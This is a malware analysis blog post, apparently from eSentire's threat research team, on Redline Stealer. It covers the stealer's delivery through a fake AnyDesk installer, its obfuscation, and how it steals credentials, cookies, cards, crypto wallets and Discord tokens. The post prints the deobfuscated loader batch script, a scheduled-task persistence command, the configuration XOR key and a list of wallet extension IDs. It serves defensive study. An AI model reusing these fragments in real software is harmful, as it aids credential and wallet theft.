Combine cutting-edge XDR technology, multi-signal threat intelligence and 24/7 Elite Threat Hunters to help you build a world-class security operation.
Our team delivers the fastest response time in the industry. Threat suppression within just 4 hours of being engaged.
Cyber risk and advisory programs that identify security gaps and build security strategies to address them.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
XDR with machine learning that eliminates noise, enables real-time detection and response, and automatically blocks threats.
Seamless integration and threat investigation across your existing tech stack.
Proactive threat intelligence, original threat research and a world-class team of seasoned industry veterans.
Extend your team capabilities and prevent business disruption with expertise from eSentire.
We balance automated blocks with rapid human-led investigations to manage threats.
Guard endpoints by isolating and remediating threats to prevent lateral spread.
Defend brute force attacks, active intrusions and unauthorized scans.
Investigation and threat detection across multi-cloud or hybrid environments.
Remediate misconfigurations, vulnerabilities and policy violations.
Investigate and respond to compromised identities and insider threats.
Stop ransomware before it spreads.
Meet regulatory compliance mandates.
Detect and respond to zero-day exploits.
End misconfigurations and policy violations.
Defend third-party and supply chain risk.
Prevent disruption by outsourcing MDR.
Adopt a risk-based security approach.
Meet insurability requirements with MDR.
Protect your most sensitive data.
Build a proven security program.
Operationalize timely, accurate, and actionable cyber threat intelligence.
THE THREAT In recent weeks, eSentire’s Threat Response Unit (TRU) has traced numerous email account compromise cases to infrastructure hosted on several related hosting…
Dec 10, 2024THE THREATUpdate: Security patches to address this vulnerability were released by Cleo on December 12th. Organizations need to update to Cleo Harmony, VLTrader, and LexiCom versions…
eSentire is The Authority in Managed Detection and Response Services, protecting the critical data and applications of 2000+ organizations in 80+ countries from known and unknown cyber threats. Founded in 2001, the company’s mission is to hunt, investigate and stop cyber threats before they become business disrupting events.
We provide sophisticated cybersecurity solutions for Managed Security Service Providers (MSSPs), Managed Service Providers (MSPs), and Value-Added Resellers (VARs). Find out why you should partner with eSentire, the Authority in Managed Detection and Response, today.
Multi-Signal MDR with 300+ technology integrations to support your existing investments.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
Three MDR package tiers are available based on per-user pricing and level of risk tolerance.
The latest security advisories, blogs, reports, industry publications and webinars published by TRU.
Compare eSentire to other Managed Detection and Response vendors to see how we stack up against the competition.
See why 2000+ organizations globally have chosen eSentire for their MDR Solution.
Redline Stealer is one of the most popular stealers being sold and used by cybercriminals. The command and control (C2) panel does not require an attacker to log in via the Web UI; everything can be managed via the Redline client on the attacker’s virtual private server (VPS). The functionality of the stealer contains multiple capabilities including obfuscation, which makes it easy for attacker(s) to manage.
This malware analysis delves deeper into the technical details of how the Redline Stealer malware operates and our security recommendations to protect your organization from being exploited.
eSentire’s Threat Response Unit (TRU) has observed Redline Stealer being distributed via fake software, AnyDesk. The landing page of the malicious website is identical to the legitimate AnyDesk website (Figures 1-2).
The fake AnyDesk installer comes in an ISO image file and is 312MB in size. This is a common practice for stealers to pad the binary with junk hex bytes to increase the file size since some sandboxes and antiviruses have file size limitations. The infection chain is shown in Figure 3.
The AnyDesk binary contains the cabinet file within RCData (Figure 4). The extracted cabinet file contains the following:
The AnyDesk binary contains the section POSTRUNPROGRAM with the command cmd /c cmd < Saputo.potm & ping -n 5 localhost. The command executes the obfuscated Saputo.potm file and then pings the localhost five times, which is intended for the malware to sleep for 5 seconds so the obfuscated file can successfully run.
The deobfuscated Saputo.potm file is shown below:
tasklist /FI "imagename eq PSUAService.exe" 2>NUL | find /I /N "psuaservice.exe">NUL if not errorlevel 1 Set pEoQCZpLBzfzlhEvxHCjS=autoit.exe <nul set /p = "ZcDpijTWATBmXUDhlfiobLGsqbhgrZ" > pEoQCZpLBzfzlhEvxHCjS MrKXuUkCoPoGpMSbrwAewuXYoFFLRDZyqNxindstr /V /R "^YbeRstbFtOUDIqBrtdMHJUtzjhOkoKZFTdVtvyDmPFkahUrGQWaXBcArzIFrfkvxPgKsybGZNhRtJLyalocksetbQRLOA$" Ritornata.potm >> pEoQCZpLBzfzlhEvxHCjS ZcDpijTWATBmXUDhlfiobLGsqbhgrove Imagine.* t pEoQCZpLBzfzlhEvxHCjS t ping localhost -n 5
The script looks for PSUAService.exe on the infected system, which is a part of Panda Cloud Antivirus Software. If the mentioned antivirus is not present on the system, the malware will execute the main payload with the renamed AutoIt tool.
imagine.potm contains the obfuscated AutoIt script where Redline stealer resides. The embedded Redline binary contains within the obfuscated AutoIt script is shown in Figure 6.
The RC4 key to decode the script is concatenated with decimal values and subtracted by 2 as shown below (snipped of the obfuscated AutoIt script):
$jnpcgiMxrEdJ = zRAVrukiOcYK(mygFPnMUDEBWrobGzyl(mwKlCHGodCtOveXOxogMpp(Binary($uSDnetQy), Binary(TtmigjRVnUPf("59[53[51[58[53[53[56[53[58[59",2)))), $UkyGgZA, $XUeaTHbWBqM)
The eSentire TRU team has observed that the threat actor(s) have been using the AutoIt wrapper to obfuscate stealers such as Mars Stealer. For a more in-depth analysis, read our blog on Mars Stealer wrapped with AutoIt.
After the execution of the binary, the files mentioned in Figure 4 will be extracted from the CAB file into IXPxxx.TMP folder under the %TEMP% path as shown in Figure 7. The renamed NTDLL.DLL file is also dropped to the folder. This is a known technique used by threat actor(s) to bypass EDR detections – loading the copy of NTDLL.DLL during the runtime. We have briefly described this technique in our Mars Stealer analysis.
An additional folder is created to run a scheduled task from, this is the persistence technique to make sure that the infected host periodically communicates with the C2.
The scheduled task creation command line (the scheduled task is named Puoi and is set to run the z file under folder %TEMP%\zqNDtAgMrV, which is the obfuscated AutoIt script containing the stealer, every 3 minutes):
schtasks.exe /create /tn "Puoi" /tr "C:\\Users\\user\\AppData\\Local\\Temp\\zqNDtAgMrV\\PJDKIgRDMm.exe.com C:\\Users\\user\\AppData\\Local\\Temp\\zqNDtAgMrV\\z" /sc minute /mo 3 /F
The deobfuscated binary contains Redline Stealer that is injected into jsc.exe process after being decrypted by a rename AutoIt process as shown in Figure 7.
The extracted .NET Redline payload is approximately 619KB in size (MD5: ee5c2ec0ec6d2b5b9c2396fb7513f83b), the original filename is Test.exe, and the compilation timestamp is July 24, 2022. Upon opening the file in a debugger, we can see that the stealer performs enumeration on the victim’s machine looking for installed browsers, FTP connections, security tools, software, crypto wallets (Figure 9).
We can also see the stealer collecting credit card (CC) information on the infected host from Chrome browsers (Figure 10).
Redline Stealer, also known as REDGlade and Glade, first appeared on hacking forums in February 2020 (Figure 11). Redline is allegedly written based on feedback from people involved in carding, the term describing an unauthorized usage of credit cards.
Similar to Raccoon Stealer, Redline requires a VPS (Virtual Private Server) dedicated server to host the panel. The stealer can be easily bought via a Telegram Bot (Figure 12) using cryptocurrency as a payment method. The price for Redline is $150USD per month and $900USD for lifetime access. Upon purchasing Redline, the user gets a link to the private chat in Telegram. At the time of this analysis, roughly 400 members were part of the telegram group. Based on a review of the chats, Russian native speakers were the most active. After the subscription expires, the user is removed from the private chat.
Redline Stealer capabilities include:
What makes Redline Stealer popular is that the control panel is quite easy to navigate through; once the user buys the stealer, they get the detailed instructions in English and Russian on Redline functionality and installation steps (Figure 13).
It is worth noting that there are a number of fake Redline sellers on Telegram who profit by luring those interested in acquiring Redline Stealer, scamming them by taking their money, and not providing Redline in exchange. Upon purchasing a Redline subscription, the user gets the link to the private Telegram chat and the request to access chat must be approved by the administrator.
The Redline panel (Figure 14) is easy to navigate through and contains the following sections:
Facebook logs are one of the popular stolen logs being bought on hacking forums (Figures 22-23). The stealer logs that contain cookies can be enticing to cybercriminals. With the cookies, an attacker would be able to bypass two-factor authentication. By using the stolen cookie, the threat actor would be able to authenticate as another user on platforms such as YouTube and Facebook.
Cybercriminals buy stolen Facebook accounts to push malicious advertisements without the user’s knowledge. Spend logs are the accounts where an attacker can spend a certain amount of money to publish their ads per day (Figure 22).
There are numerous services available where attackers can sell their stolen logs. The prices depend on what type of logs they are selling (Figure 24).
Redline logs are also in high demand on dark web markets such as RussianMarket. We can see that compared to other stealers, Redline logs are the most sold by cybercriminals (Figure 25).
It is worth noting that Redline is being distributed not only via cracked or fake software. Other means to distribute Redline are via installers and YouTube traffic (Figure 26). With YouTube traffic, an attacker would create or purchase the channel and upload a short video with the description to lure the user to install the application via the direct link.
The installers push the stealer to third-party advertising networks or platforms. The advertising service will display the ads on different webpages based on the countries that the attacker(s) specifies. (Figure 27).
More seasoned cybercriminals usually crypt or obfuscate the payload through the well-known crypters in the hacking channels named Mastif and 11. Redline also advertises one of crypters named Spectrcrypt or Spectrum Crypt which comes for free with a one-month subscription purchase (Figure 28).
The Redline logs are quite popular for sale on hacker forums and Telegram (Figures 29-30).
The non-obfuscated Redline payload is a 32-bit .NET binary with 107 KB in size. The hash of the payload and original filename changes each time the build/payload is generated from the Redline panel.
The Argument class contains the encoded payload configuration for C2 communication including the IP address, Build ID, version and the XOR key used to decrypt the configuration parameters (Figure 31).
The encoded strings are base64-encoded and XOR-ed with the hardcoded key “Raves” then base64-encoded again (Figure 32).
Under Entity16, the stealer enumerates the Login Data, Web Data, Cookies folders for Chrome and Opera GX Stable. It also searches for crypto wallet browser extensions under Local Extension Settings folders for Chrome (Figure 33).
The crypto wallet extensions decoded from Base64-encoded blob:
ffnbelfdoeiohenkjibnmadjiehjhajb|YoroiWallet | ibnejdfjmmkpcnlpebklmnkoeoihofec|Tronlink | jbdaocneiiinmjbjlgalhcelgbejmnid|NiftyWallet |
nkbihfbeogaeaoehlefnkodbefgpgknn|Metamask | afbcbjpbpfadlkmhmclhkeeodmamcflc|MathWallet | hnfanknocfeofbddgcijnmhnfnkdnaad|Coinbase |
fhbohimaelbohpjbbldcngcnapndodjp|BinanceChain | odbfpeeihdkbihmopkbjmoonfanlbfcl|BraveWallet | hpglfhgfnhbgpjdenjgmdgoeiappafln|GuardaWallet |
blnieiiffboillknjnepogjhkgnoapac|EqualWallet | cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty | fihkakfobkmkjojpchpfgcmhfjnmnfpi|BitAppWallet |
kncchdigobghenbbaddojjnnaogfppfj|iWallet | amkmjjmmflddogmhpjloimipbofnfjih|Wombat | fhilaheimglignddkjgofkcbgekhenbh|AtomicWallet |
nlbmnnijcnlegkjjpcfjclmcfggfefdm|MewCx | nanjmdknhkinifnkgdcggcfnhdaammmj|GuildWallet | nkddgncdjgjfcddamfgcmfnlhccnimig|SaturnWallet |
fnjhmkhhmkbjkkabndcnnogagogbneec|RoninWallet | aiifbnbfobpmeekipheeijimdpnlpgpp|TerraStation | fnnegphlobjdpkhecapkijjdkgcjhkib|HarmonyWallet |
aeachknmefphepccionboohckonoeemg|Coin98Wallet | cgeeodpfagjceefieflmdfphplkenlfk|TonCrystal | pdadjkfkgcafgbceimcpbkalnfnepbnk|KardiaChain |
bfnaelmomeimhlpmgjnjophhpkkoljpa|Phantom | fhilaheimglignddkjgofkcbgekhenbh|Oxygen | mgffkfbidihjpoaomajlbgchddlicgpn|PaliWallet |
aodkkagnadcbobfpggfnjeongemjbjca|BoltX | kpfopkelmapcoipemfendmdcghnegimn|LiqualityWallet | hmeobnfnfcmdkdcmlblgagmfpfboieaf|XdefiWallet |
lpfcbjknijpeeillifnkikgncikgfhdo|NamiWallet | dngmlblcodfobpdpecaadgfbcggfjfnm|MaiarDeFiWallet | ffnbelfdoeiohenkjibnmadjiehjhajb|YoroiWallet |
ibnejdfjmmkpcnlpebklmnkoeoihofec|Tronlink | jbdaocneiiinmjbjlgalhcelgbejmnid|NiftyWallet | nkbihfbeogaeaoehlefnkodbefgpgknn|Metamask |
afbcbjpbpfadlkmhmclhkeeodmamcflc|MathWallet | hnfanknocfeofbddgcijnmhnfnkdnaad|Coinbase | fhbohimaelbohpjbbldcngcnapndodjp|BinanceChain |
odbfpeeihdkbihmopkbjmoonfanlbfcl|BraveWallet | hpglfhgfnhbgpjdenjgmdgoeiappafln|GuardaWallet | blnieiiffboillknjnepogjhkgnoapac|EqualWallet |
cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty | fihkakfobkmkjojpchpfgcmhfjnmnfpi|BitAppWallet | kncchdigobghenbbaddojjnnaogfppfj|iWallet |
amkmjjmmflddogmhpjloimipbofnfjih|Wombat | fhilaheimglignddkjgofkcbgekhenbh|AtomicWallet | nlbmnnijcnlegkjjpcfjclmcfggfefdm|MewCx |
nanjmdknhkinifnkgdcggcfnhdaammmj|GuildWallet | nkddgncdjgjfcddamfgcmfnlhccnimig|SaturnWallet | fnjhmkhhmkbjkkabndcnnogagogbneec|RoninWallet |
aiifbnbfobpmeekipheeijimdpnlpgpp|TerraStation | fnnegphlobjdpkhecapkijjdkgcjhkib|HarmonyWallet | aeachknmefphepccionboohckonoeemg|Coin98Wallet |
cgeeodpfagjceefieflmdfphplkenlfk|TonCrystal | pdadjkfkgcafgbceimcpbkalnfnepbnk|KardiaChain | bfnaelmomeimhlpmgjnjophhpkkoljpa|Phantom |
fhilaheimglignddkjgofkcbgekhenbh|Oxygen | mgffkfbidihjpoaomajlbgchddlicgpn|PaliWallet | aodkkagnadcbobfpggfnjeongemjbjca|BoltX |
kpfopkelmapcoipemfendmdcghnegimn|LiqualityWallet | hmeobnfnfcmdkdcmlblgagmfpfboieaf|XdefiWallet | lpfcbjknijpeeillifnkikgncikgfhdo|NamiWallet |
dngmlblcodfobpdpecaadgfbcggfjfnm|MaiarDeFiWallet | bhghoamapcdpbohphigoooaddinpkbai|Authenticator | ookjlbkiijinhpmnjffcofjonbfbgaoc|TempleWallet |
Entity15 is likely used for performing the loader tasks (Figure 34).
The ConfigReader class looks for crypto wallets in the folders specified by an attacker in settings. Entity17 contains the information on crypto wallets. Entity16 stores the path to crypto wallets (Figure 35).
ConnectionProvider class contains the C2 communication method used in Redline. Communication with the C2 server is established via Windows Communication Foundation (WCF) with NetTCPBinding. The WCF TCP transport utilizes the net.tcp:// protocol. The destination port is specified by an attacker (Figure 36).
The example of C2 traffic generated by the workstation infected with Redline containing the stealer configuration, C2 IP, host information and files residing on the host (Figure 37); tempuri[.]org is the default WCF namespace and should not be considered as the only indicator of Redline compromise.
Entity5 gathers Discord tokens under \AppData\Roaming\discord\Local Storage\leveldb path from .log and .db files (Figure 38). Redline harvests the Discord tokens because they can bypass Two Factor Authentication (2FA) and allow users to access their accounts without providing credentials. All that is needed is the link. For detection evasion purposes, Redline adds random words into the strings and then replaces them.
Entity6 contains the module responsible for launching the loader tasks DownloadAndEx and Download (Figure 39).
Entity8, 10, 11 and 12 within EntityCreator class scans for autofills, cookies, credentials, and credit cards accordingly (Figure 40). The credentials will be then decrypted in the EntityReader class.
Previously, we mentioned that Redline stealer does not exfiltrate logs from CIS countries. The stealer checks for the local time zone of the infected machine and the default user interface language for the presence of languages used by CIS countries (Figure 41).
PartsSender class contains all the information (logs) that are sent to the attacker including user’s system information, files, wallets, credentials, and screenshot (Figure 42).
The Redline developers cleverly named the Telegram stealing module RosComNadzor (The Federal Service for Supervision of Communications, Information Technology and Mass Media).
Finally, SystemInfoHelper class (Figure 43) gathers the user’s system information, list of processes, browsers, installed programs, and sends them to the attacker as text files (Figures 44-45).
Our Threat Response Unit (TRU) combines threat intelligence obtained from research and security incidents to create practical outcomes for our customers. We are taking a comprehensive response approach to combat modern cybersecurity threats by deploying countermeasures, such as:
Our detection content is supported by investigation runbooks, ensuring our team of 24/7 SOC Cyber Analysts respond rapidly to any intrusion attempts related to known malware Tactics, Techniques, and Procedures (TTPs). In addition, TRU closely monitors the threat landscape and constantly addresses capability gaps and conducts retroactive threat hunts to assess customer impact.
We recommend implementing the following controls to help secure your organization against the Redline Stealer malware:
While the TTPs used by threat actor(s) grow in sophistication, they lead to a certain level of difficulties at which critical business decisions must be made. Preventing the various attack technique and tactics utilized by the modern threat actor requires actively monitoring the threat landscape, developing, and deploying endpoint detections, and the ability to investigate logs & network data during active intrusions.
eSentire’s TRU is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.
If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption.
Learn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire Security Specialist.
The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.